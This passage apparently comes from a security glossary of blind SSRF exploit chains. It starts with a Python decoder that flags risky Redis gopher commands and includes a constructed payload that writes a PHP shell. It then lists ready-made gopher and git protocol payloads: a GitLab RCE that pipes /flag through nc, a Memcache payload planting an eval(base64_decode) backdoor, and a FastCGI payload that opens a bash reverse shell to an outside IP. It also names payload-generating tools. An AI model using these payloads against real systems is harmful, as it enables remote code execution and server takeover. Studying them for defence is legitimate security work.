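                j = data.index("\r\n", i)
                if data[i:j].strip():
                    cmds.append(data[i:j].split())
                i = j + 2
                continue
            j = data.index("\r\n", i)
            argc = int(data[i + 1:j]); i = j + 2
            argv = []
            for _ in range(argc):
                if data[i] != "$":
                    raise ValueError("expected bulk string at offset %d" % i)
                j = data.index("\r\n", i)
                n = int(data[i + 1:j]); i = j + 2
                argv.append(data[i:i + n]); i += n + 2  # bulk payload is read by length: it may contain newlines
            cmds.append(argv)
    except (ValueError, IndexError):
        pass  # truncated or malformed tail: return what was decoded so far
    return cmds


def decode_gopher_redis(url):
    """Return (host:port, commands) for a gopher:// URL whose selector is a raw RESP stream."""
    scheme, _, netloc, selector = url.split("/", 3)  # manual split: the selector may contain '?' or '#'
    if scheme != "gopher:":
        raise ValueError("not a gopher URL")
    return netloc, parse_resp(unquote(selector[1:]))  # drop the '_' gopher item-type byte


def risky_commands(cmds):
    """Report the commands from this glossary's Redis chains that change where and what Redis writes to disk."""
    findings = []
    for argv in cmds:
        head = [a.lower() for a in argv[:2]]
        if not head:
            continue
        if head[0] == "flushall":
            findings.append("FLUSHALL wipes the dataset so the dump contains only the planted value")
        elif head[:2] == ["config", "set"] and len(argv) >= 4 and argv[2].lower() in ("dir", "dbfilename"):
            findings.append("CONFIG SET %s %s redirects the RDB dump" % (argv[2], argv[3]))
        elif head[0] in ("save", "bgsave"):
            findings.append("%s writes the dump file to the configured dir/dbfilename" % head[0].upper())
    return findings


# Constructed sample: the RESP stream the "upload a PHP shell" script above would emit,
# percent-encoded the same way that script does it (urllib's quote with '/' left unescaped).
SAMPLE_URL = "gopher://10.0.0.5:6379/_" + quote(
    "*1\r\n$8\r\nflushall\r\n"
    "*3\r\n$3\r\nset\r\n$1\r\n1\r\n$22\r\n\n\n<?php phpinfo();?>\n\n\r\n"
    "*4\r\n$6\r\nconfig\r\n$3\r\nset\r\n$3\r\ndir\r\n$4\r\n/var\r\n"
    "*4\r\n$6\r\nconfig\r\n$3\r\nset\r\n$10\r\ndbfilename\r\n$9\r\nshell.php\r\n"
    "*1\r\n$4\r\nsave\r\n"
    "quit\r\n")
```

On the Redis side the same sequence is what `rename-command CONFIG ""` and a non-empty `requirepass` are meant to stop: with CONFIG disabled the dir/dbfilename steps fail and SAVE writes only to the configured location.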

RCE on GitLab via the Git protocol

See Liveoverflow's article

Although this requires authenticated access to GitLab to exploit, I am including the payload here because the protocol may work against the target you are attacking. This payload is for reference only.

git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20127%2E0%2E0%2E1%202222%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf123321.git

Memcache

Default port: 11211

gopher://[target ip]:11211/_%0d%0aset ssrftest 1 0 147%0d%0aa:2:{s:6:"output";a:1:{s:4:"preg";a:2:{s:6:"search";s:5:"/.*/e";s:7:"replace";s:33:"eval(base64_decode($_POST[ccc]));";}}s:13:"rewritestatus";i:1;}%0d%0a
gopher://192.168.10.12:11211/_%0d%0adelete ssrftest%0d%0a

Apache Tomcat

Default ports: 80, 443 (SSL), 8080, 8443 (SSL)

Only works on Tomcat 6:

gopher-tomcat-deployer

CTF writeup using this technique:

From XXE to RCE: Pwn2Win CTF 2018 Writeup

FastCGI

Default ports: 80, 443 (SSL)

Taken from here

gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%10%00%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH97%0E%04REQUEST_METHODPOST%09%5BPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Asafe_mode%20%3D%20Off%0Aauto_prepend_file%20%3D%20php%3A//input%0F%13SCRIPT_FILENAME/var/www/html/1.php%0D%01DOCUMENT_ROOT/%01%04%00%01%00%00%00%00%01%05%00%01%00a%07%00%3C%3Fphp%20system%28%27bash%20-i%20%3E%26%20/dev/tcp/172.19.23.228/2333%200%3E%261%27%29%3Bdie%28%27-----0vcdb34oju09b8fd-----%0A%27%29%3B%3F%3E%00%00%00%00%00%00%00

Tools

Gopherus

This tool generates Gopher payloads for:

  • MySQL
  • PostgreSQL
  • FastCGI
  • Redis
  • Zabbix
  • Memcache

SSRF Proxy

SSRF Proxy is a multithreaded HTTP proxy server designed to tunnel client HTTP traffic through HTTP servers vulnerable to Server-Side Request Forgery (SSRF).

Credits:

Original: A Glossary of Blind SSRF Chains – Assetnote

Thanks to the following people who contributed to this post:

